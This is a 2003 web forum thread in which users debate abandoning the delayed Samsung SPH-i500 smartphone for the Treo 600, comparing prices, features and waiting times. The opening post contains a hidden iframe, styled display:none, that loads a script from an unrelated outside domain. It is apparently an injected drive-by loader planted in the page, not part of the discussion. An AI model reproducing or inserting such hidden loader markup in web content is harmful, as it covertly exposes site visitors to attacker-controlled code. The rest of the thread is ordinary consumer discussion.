Poll: Are you still on board the Samsung i500 ship?

+ Reply to Thread
Page 1 of 2 1 2 LastLast
    Nanotechnology Nerd shadowboxer's Avatar

Angry Poll-- Jumping the Samsung i500 ship?

OK, I just gotta know, how many of you are fed up with Samsung and the i500 debacle and are ready to hit the road and find greener pastures?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by shadowboxer; 06-30-2003 at 09:34 AM.
    dale1
    my story in phones....
    i300-->i330-->i500-->sprintt650-->ppc6700-->gsmt650-->HTC Universal-->gsmt650-->8525-->back again to my trusty t650

Samsung is about to make the list

I was willing to wait for the i500, until I say the list price. That thing is nowhere near worth that much money. I don't care about the form factor that much. I have gotten used to the i330, and the Treo 600 isn't much different size-wise. If the i500 winds up being a whole lot cheaper, I won't jump ship. Of course when the Treo 600 comes out, I will reevaluate. Right now, I just wish the damn thing would just be released!!!!!
    I can't believe it has been over a year and I still don't have one of these "new generation" smartphones!

If the Treo600 was out tommorrow then I might give up on the i500, but the fact of the matter is that most of us will get antsy when the i500 gets released and will purchase it. Now if it comes out after the Treo, then that's a different story.

My vote is to get the i500 no matter what, except if it comes out after the Treo.

Although there is still the unanswered question of the T608...hmm....

Hey spinedoc,

did you change coasts? I thought you were out West somewhere before?

Anyway, I have just about made up my mind. The T600 is generations beyond the i500 and I guess having the flip is not as important to me as all of those cool toys. . . .
    dale1
    my story in phones....
    i300-->i330-->i500-->sprintt650-->ppc6700-->gsmt650-->HTC Universal-->gsmt650-->8525-->back again to my trusty t650

PHO
    Broward County Florida, "Home of the Hanging Chad"
    i'm not sure if i should get a 330 for now and wait for the Treo 600. I'm conflicted. I know i'm going to be Rrr when the i5 comes out and i am stuck with the 330.

I don't want to wait another month

I have alreayd gone 3 months without a damn smartphone

this is getting rediculous. Also, when i am looking at the features of the Treo, i'm starting to remember all those MacMettal posts.

on treo centrla, you can actually print out one that you can fold up and get a feel for the size.

Its pretty damn small.
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

PHO
    Originally posted by shadowboxer
    Hey spinedoc,

did you change coasts? I thought you were out West somewhere before?

Anyway, I have just about made up my mind. The T600 is generations beyond the i500 and I guess having the flip is not as important to me as all of those cool toys. . . .
    But, Shadow, we need our own T 600 forum over here i can't take all those Treo is the best thing in the world Idiots on Treo Central. I mean the T 300 is a POS sorry spine doc i think it is
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

Angry Samsung/Sprint is Joke

Samsung/Sprint have become a joke. I saw ads this last week in San Antonio for the A600, which was announced 6 months after the i500, and looks like it will be released before the i500. I am really beginning to believe the i500 doesn't exist - as a shippable product. No marketing type in their right mind would leave thousands of these things sitting in a warehouse somewhere if they were anywhere close to marketable.

THEREFORE, I OFFICIALLY DECLARE THE SPH-i500 DEAD!

Assuming it ever really existed (and I do, since Mossberg has a pretty good reputation for truth), it must be dead. Perhaps we've been too prophetic in comparing the imminent (boy, that in itself is a joke) release of the European SPG-i500. It was just too much of an embarrasment to release a rotary phone is a dial tone world.
    Dale2 - The "P" in PDA is for Personal. There is no "best" PDA.
    Sprint CDMA Treo 650 since 11/05

An hour ago, I was getting an i500 "no matter what"...... but I have been reading more info on the T600 and I really like it. I have had an i300 for about 19 months now, so I am used to the non-clam style, even though I perfer a clam phone. But the Treo is tempting me to tell Samsung to stick it. I think I am going to cancel my preorder with CompUSA and think about this a little more.... or I could just get the i500 and move the the T600 when it comes out. Too many decisisons.

I just need more info on the battery life on the Treo.
    Carl

Carl - exercise the best of both worlds and hold on to your pre-order. It can't hurt to see if anything budges on 7/7. I'm truly looking at another course - the Treo 300 to Treo 600 shuffle. However, finding a low cost Treo 300 seems to be a problem right now as Amazon dropped all rebates, and Sprint is only offering $100 today.

Add to this the fact that the price of the i330 went back UP to $499 at Best Buy, and I have severe doubts that the i500 will see light of day any time soon. If it were, wouldn't the predecessor options be goin gon DISCOUNT?

Thumbs down

AAAARRRRRGGGGHHHHHH

I've hit 200 posts about a phone that still isn't out!

I gotta get a life

dale1
    my story in phones....

Since I am not in the market to replace my i300 until October-ish, the delays don't bother me much. I was, however, hoping that you all would work all the bugs out long before I got it. At the rate it is going, I might get it only a few months (or weeks) after ya'll.

On the other foot, obviously the SGH-i500 is a much more better unit. If Samsung ditched the SPH-i500 and put out the SGH, I don't think anyone here would complain that much (unless we have to wait another year to get it). I doubt this will happen. More likely, they will eventually ship the SPH.

Believe it or not, there are pleny of people that do not read these message boards, and they will be walking through Best Buy some day in the future and see this i500 thingy they never heard of, and see that it is small and has Palm OS, and Samsung will sell lots of them.......and all us suckers that suffered through the wait will only vaguely remember the anquish a year from now as we tap our i500 screens. Of course we will also be on a different forum waiting for the next smart phone after that.

Originally posted by dstrauss
    Carl - exercise the best of both worlds and hold on to your pre-order. It can't hurt to see if anything budges on 7/7.
    Dale, I think that is the conclusion I have reached. But the T600 is really tempting me to just forget about the i500.

Samsung has really blown this one.
    Carl

Originally posted by PHO
    But, Shadow, we need our own T 600 forum over here i can't take all those Treo is the best thing in the world Idiots on Treo Central. I mean the T 300 is a POS sorry spine doc i think it is
    Yeah, I know what you mean, when the i700 first came out and I spent a lot of time on the PPC lets see how much we can bash the palm platform today forums and got really sick of the hogwash.

At least with the T600, I think that the treo afficionados have something to be excited about.

-dale2
    dale1
    my story in phones....

There IS a Treo 600 forum here already.
    Carl

My vote for now is to stick with the i5. Other options in the way of smart phones are so close in price to the aforementioned i5 that it would absurd to buy something else in interim. I am however considering a two device solution until the i5 is released, whenever that is.
    Last edited by leitaren; 06-30-2003 at 11:22 AM.

Originally posted by leitaren
    . I am however considering a two device solution until the i5 is release, whenever that is.

"two devices"

Isn't that a four letter word?

dale1
    my story in phones....

"two devices"

Isn't that a four letter word?

dale2 -

What would be your description fo the i330 shuffle so far? Would it be a good interim solution for an i500 fence sitter? I just can't stand this waiting. In fact, the ONLY thing keeping me in teh i500 camp at this point is the usefulness out here in no man's land of having analog roaming when needed (otherwise, it would definately be adios - Treo here I come)

dale

If you could get a i330 for $300-$350 or so, I would. I just can't see paying $500 for it, though. Other than the problems with crashes ( I am now 4 weeks without one), it is a good phone and pda combo, is not too big, and I thought that going from 8 to 16 megabytes memory was worthwhile in of itself for the upgrade from the i300.

With Scotts hack for the alarms and Scotts skin program, it has become an even better phone. And it does indeed have analog that works reasonably well, but for when we travel out in the middle of nowhere, I have a 3 watt analog bag phone that I bring along, because I find the reception on most all of the handheld analog cell phones too poor when you get between towers or far out.

anyway, good luck with your decsion

dale2
    dale1
    my story in phones....

PHO
    Originally posted by CarlGalgano
    There IS a Treo 600 forum here already.
    '

Jeez you guys have been busy today

I know there is a treo forum, but no one uses it i'm just saying that we have to get people using our forum. the i500 forum has fallen prey to what alot of other forums are out there, lots of banter, few answers. The i330 and i300 forums, basically Smart Phone Forums .com has relaly been a solid information board, with less Pro Samsung or Pro Sprint banter and factual information.

Now, All we need is a new logo and WHoah, hey, look at that, we have a new logo.

Re: Shadow

Yes, you need a life, my girlfriend agrees with you as it relates to me as well. She feels like she is dating not only me, but me, the HDTV and this forum

www.grtalk.com

dale

If you could get a i330 for $300-$350 or so, I would. I just can't see paying $500 for it, though.
    dale2
    I'm on the hunt for that i330 as we speak, but it really does look like the price on it and the Trea 300 have both gone back to nose-bleed territory in the last couple of weeks. That just seems totaly counter to the usual discounting you'd expect to see prior to the release of a successor product (whether i500 or Treo 600).